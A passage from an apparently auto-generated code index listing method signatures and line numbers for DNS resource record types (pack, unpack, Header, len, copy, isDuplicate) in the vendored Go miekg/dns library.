bool { method isDuplicate (line 999) | func (r1 *RRSIG) isDuplicate(_r2 RR) bool { method isDuplicate (line 1035) | func (r1 *RT) isDuplicate(_r2 RR) bool { method isDuplicate (line 1050) | func (r1 *SIG) isDuplicate(_r2 RR) bool { method isDuplicate (line 1086) | func (r1 *SMIMEA) isDuplicate(_r2 RR) bool { method isDuplicate (line 1107) | func (r1 *SOA) isDuplicate(_r2 RR) bool { method isDuplicate (line 1137) | func (r1 *SPF) isDuplicate(_r2 RR) bool { method isDuplicate (line 1154) | func (r1 *SRV) isDuplicate(_r2 RR) bool { method isDuplicate (line 1175) | func (r1 *SSHFP) isDuplicate(_r2 RR) bool { method isDuplicate (line 1193) | func (r1 *SVCB) isDuplicate(_r2 RR) bool { method isDuplicate (line 1214) | func (r1 *TA) isDuplicate(_r2 RR) bool { method isDuplicate (line 1235) | func (r1 *TALINK) isDuplicate(_r2 RR) bool { method isDuplicate (line 1250) | func (r1 *TKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 1286) | func (r1 *TLSA) isDuplicate(_r2 RR) bool { method isDuplicate (line 1307) | func (r1 *TSIG) isDuplicate(_r2 RR) bool { method isDuplicate (line 1343) | func (r1 *TXT) isDuplicate(_r2 RR) bool { method isDuplicate (line 1360) | func (r1 *UID) isDuplicate(_r2 RR) bool { method isDuplicate (line 1372) | func (r1 *UINFO) isDuplicate(_r2 RR) bool { method isDuplicate (line 1384) | func (r1 *URI) isDuplicate(_r2 RR) bool { method isDuplicate (line 1402) | func (r1 *X25) isDuplicate(_r2 RR) bool { method isDuplicate (line 1414) | func (r1 *ZONEMD) isDuplicate(_r2 RR) bool { FILE: vendor/github.com/miekg/dns/zmsg.go method pack (line 7) | func (rr *A) pack(msg []byte, off int, compression compressionMap, compr... method pack (line 15) | func (rr *AAAA) pack(msg []byte, off int, compression compressionMap, co... method pack (line 23) | func (rr *AFSDB) pack(msg []byte, off int, compression compressionMap, c... method pack (line 35) | func (rr *AMTRELAY) pack(msg []byte, off int, compression compressionMap... method pack (line 51) | func (rr *ANY) pack(msg []byte, off int, compression compressionMap, com... method pack (line 55) | func (rr *APL) pack(msg []byte, off int, compression compressionMap, com... method pack (line 63) | func (rr *AVC) pack(msg []byte, off int, compression compressionMap, com... method pack (line 71) | func (rr *CAA) pack(msg []byte, off int, compression compressionMap, com... method pack (line 87) | func (rr *CDNSKEY) pack(msg []byte, off int, compression compressionMap,... method pack (line 107) | func (rr *CDS) pack(msg []byte, off int, compression compressionMap, com... method pack (line 127) | func (rr *CERT) pack(msg []byte, off int, compression compressionMap, co... method pack (line 147) | func (rr *CNAME) pack(msg []byte, off int, compression compressionMap, c... method pack (line 155) | func (rr *CSYNC) pack(msg []byte, off int, compression compressionMap, c... method pack (line 171) | func (rr *DHCID) pack(msg []byte, off int, compression compressionMap, c... method pack (line 179) | func (rr *DLV) pack(msg []byte, off int, compression compressionMap, com... method pack (line 199) | func (rr *DNAME) pack(msg []byte, off int, compression compressionMap, c... method pack (line 207) | func (rr *DNSKEY) pack(msg []byte, off int, compression compressionMap, ... method pack (line 227) | func (rr *DS) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 247) | func (rr *EID) pack(msg []byte, off int, compression compressionMap, com... method pack (line 255) | func (rr *EUI48) pack(msg []byte, off int, compression compressionMap, c... method pack (line 263) | func (rr *EUI64) pack(msg []byte, off int, compression compressionMap, c... method pack (line 271) | func (rr *GID) pack(msg []byte, off int, compression compressionMap, com... method pack (line 279) | func (rr *GPOS) pack(msg []byte, off int, compression compressionMap, co... method pack (line 295) | func (rr *HINFO) pack(msg []byte, off int, compression compressionMap, c... method pack (line 307) | func (rr *HIP) pack(msg []byte, off int, compression compressionMap, com... method pack (line 335) | func (rr *HTTPS) pack(msg []byte, off int, compression compressionMap, c... method pack (line 351) | func (rr *IPSECKEY) pack(msg []byte, off int, compression compressionMap... method pack (line 375) | func (rr *ISDN) pack(msg []byte, off int, compression compressionMap, co... method pack (line 387) | func (rr *KEY) pack(msg []byte, off int, compression compressionMap, com... method pack (line 407) | func (rr *KX) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 419) | func (rr *L32) pack(msg []byte, off int, compression compressionMap, com... method pack (line 431) | func (rr *L64) pack(msg []byte, off int, compression compressionMap, com... method pack (line 443) | func (rr *LOC) pack(msg []byte, off int, compression compressionMap, com... method pack (line 475) | func (rr *LP) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 487) | func (rr *MB) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 495) | func (rr *MD) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 503) | func (rr *MF) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 511) | func (rr *MG) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 519) | func (rr *MINFO) pack(msg []byte, off int, compression compressionMap, c... method pack (line 531) | func (rr *MR) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 539) | func (rr *MX) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 551) | func (rr *NAPTR) pack(msg []byte, off int, compression compressionMap, c... method pack (line 579) | func (rr *NID) pack(msg []byte, off int, compression compressionMap, com... method pack (line 591) | func (rr *NIMLOC) pack(msg []byte, off int, compression compressionMap, ... method pack (line 599) | func (rr *NINFO) pack(msg []byte, off int, compression compressionMap, c... method pack (line 607) | func (rr *NS) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 615) | func (rr *NSAPPTR) pack(msg []byte, off int, compression compressionMap,... method pack (line 623) | func (rr *NSEC) pack(msg []byte, off int, compression compressionMap, co... method pack (line 635) | func (rr *NSEC3) pack(msg []byte, off int, compression compressionMap, c... method pack (line 674) | func (rr *NSEC3PARAM) pack(msg []byte, off int, compression compressionM... method pack (line 701) | func (rr *NULL) pack(msg []byte, off int, compression compressionMap, co... method pack (line 709) | func (rr *NXT) pack(msg []byte, off int, compression compressionMap, com... method pack (line 721) | func (rr *OPENPGPKEY) pack(msg []byte, off int, compression compressionM... method pack (line 729) | func (rr *OPT) pack(msg []byte, off int, compression compressionMap, com... method pack (line 737) | func (rr *PTR) pack(msg []byte, off int, compression compressionMap, com... method pack (line 745) | func (rr *PX) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 761) | func (rr *RFC3597) pack(msg []byte, off int, compression compressionMap,... method pack (line 769) | func (rr *RKEY) pack(msg []byte, off int, compression compressionMap, co... method pack (line 789) | func (rr *RP) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 801) | func (rr *RRSIG) pack(msg []byte, off int, compression compressionMap, c... method pack (line 841) | func (rr *RT) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 853) | func (rr *SIG) pack(msg []byte, off int, compression compressionMap, com... method pack (line 893) | func (rr *SMIMEA) pack(msg []byte, off int, compression compressionMap, ... method pack (line 913) | func (rr *SOA) pack(msg []byte, off int, compression compressionMap, com... method pack (line 945) | func (rr *SPF) pack(msg []byte, off int, compression compressionMap, com... method pack (line 953) | func (rr *SRV) pack(msg []byte, off int, compression compressionMap, com... method pack (line 973) | func (rr *SSHFP) pack(msg []byte, off int, compression compressionMap, c... method pack (line 989) | func (rr *SVCB) pack(msg []byte, off int, compression compressionMap, co... method pack (line 1005) | func (rr *TA) pack(msg []byte, off int, compression compressionMap, comp... method pack (line 1025) | func (rr *TALINK) pack(msg []byte, off int, compression compressionMap, ... method pack (line 1037) | func (rr *TKEY) pack(msg []byte, off int, compression compressionMap, co... method pack (line 1077) | func (rr *TLSA) pack(msg []byte, off int, compression compressionMap, co... method pack (line 1097) | func (rr *TSIG) pack(msg []byte, off int, compression compressionMap, co... method pack (line 1137) | func (rr *TXT) pack(msg []byte, off int, compression compressionMap, com... method pack (line 1145) | func (rr *UID) pack(msg []byte, off int, compression compressionMap, com... method pack (line 1153) | func (rr *UINFO) pack(msg []byte, off int, compression compressionMap, c... method pack (line 1161) | func (rr *URI) pack(msg []byte, off int, compression compressionMap, com... method pack (line 1177) | func (rr *X25) pack(msg []byte, off int, compression compressionMap, com... method pack (line 1185) | func (rr *ZONEMD) pack(msg []byte, off int, compression compressionMap, ... method unpack (line 1207) | func (rr *A) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1218) | func (rr *AAAA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1229) | func (rr *AFSDB) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1247) | func (rr *AMTRELAY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1275) | func (rr *ANY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1282) | func (rr *APL) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1293) | func (rr *AVC) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1304) | func (rr *CAA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1329) | func (rr *CDNSKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1361) | func (rr *CDS) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1393) | func (rr *CERT) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1425) | func (rr *CNAME) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1436) | func (rr *CSYNC) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1461) | func (rr *DHCID) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1472) | func (rr *DLV) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1504) | func (rr *DNAME) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1515) | func (rr *DNSKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1547) | func (rr *DS) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1579) | func (rr *EID) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1590) | func (rr *EUI48) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1601) | func (rr *EUI64) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1612) | func (rr *GID) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1623) | func (rr *GPOS) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1648) | func (rr *HINFO) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1666) | func (rr *HIP) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1706) | func (rr *HTTPS) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1731) | func (rr *IPSECKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1773) | func (rr *ISDN) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1791) | func (rr *KEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1823) | func (rr *KX) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1841) | func (rr *L32) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1859) | func (rr *L64) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1877) | func (rr *LOC) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1930) | func (rr *LP) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1948) | func (rr *MB) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1959) | func (rr *MD) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1970) | func (rr *MF) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1981) | func (rr *MG) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 1992) | func (rr *MINFO) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2010) | func (rr *MR) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2021) | func (rr *MX) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2039) | func (rr *NAPTR) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2085) | func (rr *NID) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2103) | func (rr *NIMLOC) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2114) | func (rr *NINFO) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2125) | func (rr *NS) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2136) | func (rr *NSAPPTR) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2147) | func (rr *NSEC) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2165) | func (rr *NSEC3) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2219) | func (rr *NSEC3PARAM) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2258) | func (rr *NULL) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2269) | func (rr *NXT) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2287) | func (rr *OPENPGPKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2298) | func (rr *OPT) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2309) | func (rr *PTR) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2320) | func (rr *PX) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2345) | func (rr *RFC3597) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2356) | func (rr *RKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2388) | func (rr *RP) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2406) | func (rr *RRSIG) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2473) | func (rr *RT) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2491) | func (rr *SIG) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2558) | func (rr *SMIMEA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2590) | func (rr *SOA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2643) | func (rr *SPF) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2654) | func (rr *SRV) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2686) | func (rr *SSHFP) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2711) | func (rr *SVCB) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2736) | func (rr *TA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2768) | func (rr *TALINK) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2786) | func (rr *TKEY) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2850) | func (rr *TLSA) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2882) | func (rr *TSIG) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2946) | func (rr *TXT) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2957) | func (rr *UID) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2968) | func (rr *UINFO) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 2979) | func (rr *URI) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 3004) | func (rr *X25) unpack(msg []byte, off int) (off1 int, err error) { method unpack (line 3015) | func (rr *ZONEMD) unpack(msg []byte, off int) (off1 int, err error) { FILE: vendor/github.com/miekg/dns/ztypes.go method Header (line 182) | func (rr *A) Header() *RR_Header { return &rr.Hdr } method Header (line 183) | func (rr *AAAA) Header() *RR_Header { return &rr.Hdr } method Header (line 184) | func (rr *AFSDB) Header() *RR_Header { return &rr.Hdr } method Header (line 185) | func (rr *AMTRELAY) Header() *RR_Header { return &rr.Hdr } method Header (line 186) | func (rr *ANY) Header() *RR_Header { return &rr.Hdr } method Header (line 187) | func (rr *APL) Header() *RR_Header { return &rr.Hdr } method Header (line 188) | func (rr *AVC) Header() *RR_Header { return &rr.Hdr } method Header (line 189) | func (rr *CAA) Header() *RR_Header { return &rr.Hdr } method Header (line 190) | func (rr *CDNSKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 191) | func (rr *CDS) Header() *RR_Header { return &rr.Hdr } method Header (line 192) | func (rr *CERT) Header() *RR_Header { return &rr.Hdr } method Header (line 193) | func (rr *CNAME) Header() *RR_Header { return &rr.Hdr } method Header (line 194) | func (rr *CSYNC) Header() *RR_Header { return &rr.Hdr } method Header (line 195) | func (rr *DHCID) Header() *RR_Header { return &rr.Hdr } method Header (line 196) | func (rr *DLV) Header() *RR_Header { return &rr.Hdr } method Header (line 197) | func (rr *DNAME) Header() *RR_Header { return &rr.Hdr } method Header (line 198) | func (rr *DNSKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 199) | func (rr *DS) Header() *RR_Header { return &rr.Hdr } method Header (line 200) | func (rr *EID) Header() *RR_Header { return &rr.Hdr } method Header (line 201) | func (rr *EUI48) Header() *RR_Header { return &rr.Hdr } method Header (line 202) | func (rr *EUI64) Header() *RR_Header { return &rr.Hdr } method Header (line 203) | func (rr *GID) Header() *RR_Header { return &rr.Hdr } method Header (line 204) | func (rr *GPOS) Header() *RR_Header { return &rr.Hdr } method Header (line 205) | func (rr *HINFO) Header() *RR_Header { return &rr.Hdr } method Header (line 206) | func (rr *HIP) Header() *RR_Header { return &rr.Hdr } method Header (line 207) | func (rr *HTTPS) Header() *RR_Header { return &rr.Hdr } method Header (line 208) | func (rr *IPSECKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 209) | func (rr *ISDN) Header() *RR_Header { return &rr.Hdr } method Header (line 210) | func (rr *KEY) Header() *RR_Header { return &rr.Hdr } method Header (line 211) | func (rr *KX) Header() *RR_Header { return &rr.Hdr } method Header (line 212) | func (rr *L32) Header() *RR_Header { return &rr.Hdr } method Header (line 213) | func (rr *L64) Header() *RR_Header { return &rr.Hdr } method Header (line 214) | func (rr *LOC) Header() *RR_Header { return &rr.Hdr } method Header (line 215) | func (rr *LP) Header() *RR_Header { return &rr.Hdr } method Header (line 216) | func (rr *MB) Header() *RR_Header { return &rr.Hdr } method Header (line 217) | func (rr *MD) Header() *RR_Header { return &rr.Hdr } method Header (line 218) | func (rr *MF) Header() *RR_Header { return &rr.Hdr } method Header (line 219) | func (rr *MG) Header() *RR_Header { return &rr.Hdr } method Header (line 220) | func (rr *MINFO) Header() *RR_Header { return &rr.Hdr } method Header (line 221) | func (rr *MR) Header() *RR_Header { return &rr.Hdr } method Header (line 222) | func (rr *MX) Header() *RR_Header { return &rr.Hdr } method Header (line 223) | func (rr *NAPTR) Header() *RR_Header { return &rr.Hdr } method Header (line 224) | func (rr *NID) Header() *RR_Header { return &rr.Hdr } method Header (line 225) | func (rr *NIMLOC) Header() *RR_Header { return &rr.Hdr } method Header (line 226) | func (rr *NINFO) Header() *RR_Header { return &rr.Hdr } method Header (line 227) | func (rr *NS) Header() *RR_Header { return &rr.Hdr } method Header (line 228) | func (rr *NSAPPTR) Header() *RR_Header { return &rr.Hdr } method Header (line 229) | func (rr *NSEC) Header() *RR_Header { return &rr.Hdr } method Header (line 230) | func (rr *NSEC3) Header() *RR_Header { return &rr.Hdr } method Header (line 231) | func (rr *NSEC3PARAM) Header() *RR_Header { return &rr.Hdr } method Header (line 232) | func (rr *NULL) Header() *RR_Header { return &rr.Hdr } method Header (line 233) | func (rr *NXT) Header() *RR_Header { return &rr.Hdr } method Header (line 234) | func (rr *OPENPGPKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 235) | func (rr *OPT) Header() *RR_Header { return &rr.Hdr } method Header (line 236) | func (rr *PTR) Header() *RR_Header { return &rr.Hdr } method Header (line 237) | func (rr *PX) Header() *RR_Header { return &rr.Hdr } method Header (line 238) | func (rr *RFC3597) Header() *RR_Header { return &rr.Hdr } method Header (line 239) | func (rr *RKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 240) | func (rr *RP) Header() *RR_Header { return &rr.Hdr } method Header (line 241) | func (rr *RRSIG) Header() *RR_Header { return &rr.Hdr } method Header (line 242) | func (rr *RT) Header() *RR_Header { return &rr.Hdr } method Header (line 243) | func (rr *SIG) Header() *RR_Header { return &rr.Hdr } method Header (line 244) | func (rr *SMIMEA) Header() *RR_Header { return &rr.Hdr } method Header (line 245) | func (rr *SOA) Header() *RR_Header { return &rr.Hdr } method Header (line 246) | func (rr *SPF) Header() *RR_Header { return &rr.Hdr } method Header (line 247) | func (rr *SRV) Header() *RR_Header { return &rr.Hdr } method Header (line 248) | func (rr *SSHFP) Header() *RR_Header { return &rr.Hdr } method Header (line 249) | func (rr *SVCB) Header() *RR_Header { return &rr.Hdr } method Header (line 250) | func (rr *TA) Header() *RR_Header { return &rr.Hdr } method Header (line 251) | func (rr *TALINK) Header() *RR_Header { return &rr.Hdr } method Header (line 252) | func (rr *TKEY) Header() *RR_Header { return &rr.Hdr } method Header (line 253) | func (rr *TLSA) Header() *RR_Header { return &rr.Hdr } method Header (line 254) | func (rr *TSIG) Header() *RR_Header { return &rr.Hdr } method Header (line 255) | func (rr *TXT) Header() *RR_Header { return &rr.Hdr } method Header (line 256) | func (rr *UID) Header() *RR_Header { return &rr.Hdr } method Header (line 257) | func (rr *UINFO) Header() *RR_Header { return &rr.Hdr } method Header (line 258) | func (rr *URI) Header() *RR_Header { return &rr.Hdr } method Header (line 259) | func (rr *X25) Header() *RR_Header { return &rr.Hdr } method Header (line 260) | func (rr *ZONEMD) Header() *RR_Header { return &rr.Hdr } method len (line 263) | func (rr *A) len(off int, compression map[string]struct{}) int { method len (line 271) | func (rr *AAAA) len(off int, compression map[string]struct{}) int { method len (line 279) | func (rr *AFSDB) len(off int, compression map[string]struct{}) int { method len (line 286) | func (rr *AMTRELAY) len(off int, compression map[string]struct{}) int { method len (line 301) | func (rr *ANY) len(off int, compression map[string]struct{}) int { method len (line 306) | func (rr *APL) len(off int, compression map[string]struct{}) int { method len (line 314) | func (rr *AVC) len(off int, compression map[string]struct{}) int { method len (line 322) | func (rr *CAA) len(off int, compression map[string]struct{}) int { method len (line 330) | func (rr *CERT) len(off int, compression map[string]struct{}) int { method len (line 339) | func (rr *CNAME) len(off int, compression map[string]struct{}) int { method len (line 345) | func (rr *DHCID) len(off int, compression map[string]struct{}) int { method len (line 351) | func (rr *DNAME) len(off int, compression map[string]struct{}) int { method len (line 357) | func (rr *DNSKEY) len(off int, compression map[string]struct{}) int { method len (line 366) | func (rr *DS) len(off int, compression map[string]struct{}) int { method len (line 375) | func (rr *EID) len(off int, compression map[string]struct{}) int { method len (line 381) | func (rr *EUI48) len(off int, compression map[string]struct{}) int { method len (line 387) | func (rr *EUI64) len(off int, compression map[string]struct{}) int { method len (line 393) | func (rr *GID) len(off int, compression map[string]struct{}) int { method len (line 399) | func (rr *GPOS) len(off int, compression map[string]struct{}) int { method len (line 407) | func (rr *HINFO) len(off int, compression map[string]struct{}) int { method len (line 414) | func (rr *HIP) len(off int, compression map[string]struct{}) int { method len (line 427) | func (rr *IPSECKEY) len(off int, compression map[string]struct{}) int { method len (line 444) | func (rr *ISDN) len(off int, compression map[string]struct{}) int { method len (line 451) | func (rr *KX) len(off int, compression map[string]struct{}) int { method len (line 458) | func (rr *L32) len(off int, compression map[string]struct{}) int { method len (line 467) | func (rr *L64) len(off int, compression map[string]struct{}) int { method len (line 474) | func (rr *LOC) len(off int, compression map[string]struct{}) int { method len (line 486) | func (rr *LP) len(off int, compression map[string]struct{}) int { method len (line 493) | func (rr *MB) len(off int, compression map[string]struct{}) int { method len (line 499) | func (rr *MD) len(off int, compression map[string]struct{}) int { method len (line 505) | func (rr *MF) len(off int, compression map[string]struct{}) int { method len (line 511) | func (rr *MG) len(off int, compression map[string]struct{}) int { method len (line 517) | func (rr *MINFO) len(off int, compression map[string]struct{}) int { method len (line 524) | func (rr *MR) len(off int, compression map[string]struct{}) int { method len (line 530) | func (rr *MX) len(off int, compression map[string]struct{}) int { method len (line 537) | func (rr *NAPTR) len(off int, compression map[string]struct{}) int { method len (line 548) | func (rr *NID) len(off int, compression map[string]struct{}) int { method len (line 555) | func (rr *NIMLOC) len(off int, compression map[string]struct{}) int { method len (line 561) | func (rr *NINFO) len(off int, compression map[string]struct{}) int { method len (line 569) | func (rr *NS) len(off int, compression map[string]struct{}) int { method len (line 575) | func (rr *NSAPPTR) len(off int, compression map[string]struct{}) int { method len (line 581) | func (rr *NSEC3PARAM) len(off int, compression map[string]struct{}) int { method len (line 591) | func (rr *NULL) len(off int, compression map[string]struct{}) int { method len (line 597) | func (rr *OPENPGPKEY) len(off int, compression map[string]struct{}) int { method len (line 603) | func (rr *PTR) len(off int, compression map[string]struct{}) int { method len (line 609) | func (rr *PX) len(off int, compression map[string]struct{}) int { method len (line 617) | func (rr *RFC3597) len(off int, compression map[string]struct{}) int { method len (line 623) | func (rr *RKEY) len(off int, compression map[string]struct{}) int { method len (line 632) | func (rr *RP) len(off int, compression map[string]struct{}) int { method len (line 639) | func (rr *RRSIG) len(off int, compression map[string]struct{}) int { method len (line 653) | func (rr *RT) len(off int, compression map[string]struct{}) int { method len (line 660) | func (rr *SMIMEA) len(off int, compression map[string]struct{}) int { method len (line 669) | func (rr *SOA) len(off int, compression map[string]struct{}) int { method len (line 681) | func (rr *SPF) len(off int, compression map[string]struct{}) int { method len (line 689) | func (rr *SRV) len(off int, compression map[string]struct{}) int { method len (line 698) | func (rr *SSHFP) len(off int, compression map[string]struct{}) int { method len (line 706) | func (rr *SVCB) len(off int, compression map[string]struct{}) int { method len (line 716) | func (rr *TA) len(off int, compression map[string]struct{}) int { method len (line 725) | func (rr *TALINK) len(off int, compression map[string]struct{}) int { method len (line 732) | func (rr *TKEY) len(off int, compression map[string]struct{}) int { method len (line 746) | func (rr *TLSA) len(off int, compression map[string]struct{}) int { method len (line 755) | func (rr *TSIG) len(off int, compression map[string]struct{}) int { method len (line 769) | func (rr *TXT) len(off int, compression map[string]struct{}) int { method len (line 777) | func (rr *UID) len(off int, compression map[string]struct{}) int { method len (line 783) | func (rr *UINFO) len(off int, compression map[string]struct{}) int { method len (line 789) | func (rr *URI) len(off int, compression map[string]struct{}) int { method len (line 797) | func (rr *X25) len(off int, compression map[string]struct{}) int { method len (line 803) | func (rr *ZONEMD) len(off int, compression map[string]struct{}) int { method copy (line 813) | func (rr *A) copy() RR { method copy (line 817) | func (rr *AAAA) copy() RR { method copy (line 821) | func (rr *AFSDB) copy() RR { method copy (line 825) | func (rr *AMTRELAY) copy() RR { method copy (line 835) | func (rr *ANY) copy() RR { method copy (line 839) | func (rr *APL) copy() RR { method copy (line 847) | func (rr *AVC) copy() RR { method copy (line 851) | func (rr *CAA) copy() RR { method copy (line 860) | func (rr *CDNSKEY) copy() RR { method copy (line 864) | func (rr *CDS) copy() RR { method copy (line 868) | func (rr *CERT) copy() RR { method copy (line 878) | func (rr *CNAME) copy() RR { method copy (line 882) | func (rr *CSYNC) copy() RR { method copy (line 891) | func (rr *DHCID) copy() RR { method copy (line 895) | func (rr *DLV) copy() RR { method copy (line 899) | func (rr *DNAME) copy() RR { method copy (line 903) | func (rr *DNSKEY) copy() RR { method copy (line 913) | func (rr *DS) copy() RR { method copy (line 923) | func (rr *EID) copy() RR { method copy (line 927) | func (rr *EUI48) copy() RR { method copy (line 931) | func (rr *EUI64) copy() RR { method copy (line 935) | func (rr *GID) copy() RR { method copy (line 939) | func (rr *GPOS) copy() RR { method copy (line 948) | func (rr *HINFO) copy() RR { method copy (line 952) | func (rr *HIP) copy() RR { method copy (line 964) | func (rr *HTTPS) copy() RR { method copy (line 968) | func (rr *IPSECKEY) copy() RR { method copy (line 980) | func (rr *ISDN) copy() RR { method copy (line 984) | func (rr *KEY) copy() RR { method copy (line 988) | func (rr *KX) copy() RR { method copy (line 992) | func (rr *L32) copy() RR { method copy (line 996) | func (rr *L64) copy() RR { method copy (line 1000) | func (rr *LOC) copy() RR { method copy (line 1013) | func (rr *LP) copy() RR { method copy (line 1017) | func (rr *MB) copy() RR { method copy (line 1021) | func (rr *MD) copy() RR { method copy (line 1025) | func (rr *MF) copy() RR { method copy (line 1029) | func (rr *MG) copy() RR { method copy (line 1033) | func (rr *MINFO) copy() RR { method copy (line 1037) | func (rr *MR) copy() RR { method copy (line 1041) | func (rr *MX) copy() RR { method copy (line 1045) | func (rr *NAPTR) copy() RR { method copy (line 1057) | func (rr *NID) copy() RR { method copy (line 1061) | func (rr *NIMLOC) copy() RR { method copy (line 1065) | func (rr *NINFO) copy() RR { method copy (line 1069) | func (rr *NS) copy() RR { method copy (line 1073) | func (rr *NSAPPTR) copy() RR { method copy (line 1077) | func (rr *NSEC) copy() RR { method copy (line 1081) | func (rr *NSEC3) copy() RR { method copy (line 1095) | func (rr *NSEC3PARAM) copy() RR { method copy (line 1106) | func (rr *NULL) copy() RR { method copy (line 1110) | func (rr *NXT) copy() RR { method copy (line 1114) | func (rr *OPENPGPKEY) copy() RR { method copy (line 1118) | func (rr *OPT) copy() RR { method copy (line 1126) | func (rr *PTR) copy() RR { method copy (line 1130) | func (rr *PX) copy() RR { method copy (line 1139) | func (rr *RFC3597) copy() RR { method copy (line 1143) | func (rr *RKEY) copy() RR { method copy (line 1153) | func (rr *RP) copy() RR { method copy (line 1157) | func (rr *RRSIG) copy() RR { method copy (line 1172) | func (rr *RT) copy() RR { method copy (line 1176) | func (rr *SIG) copy() RR { method copy (line 1180) | func (rr *SMIMEA) copy() RR { method copy (line 1190) | func (rr *SOA) copy() RR { method copy (line 1203) | func (rr *SPF) copy() RR { method copy (line 1207) | func (rr *SRV) copy() RR { method copy (line 1217) | func (rr *SSHFP) copy() RR { method copy (line 1226) | func (rr *SVCB) copy() RR { method copy (line 1239) | func (rr *TA) copy() RR { method copy (line 1249) | func (rr *TALINK) copy() RR { method copy (line 1253) | func (rr *TKEY) copy() RR { method copy (line 1268) | func (rr *TLSA) copy() RR { method copy (line 1278) | func (rr *TSIG) copy() RR { method copy (line 1293) | func (rr *TXT) copy() RR { method copy (line 1297) | func (rr *UID) copy() RR { method copy (line 1301) | func (rr *UINFO) copy() RR { method copy (line 1305) | func (rr *URI) copy() RR { method copy (line 1314) | func (rr *X25) copy() RR { method copy (line 1318) | 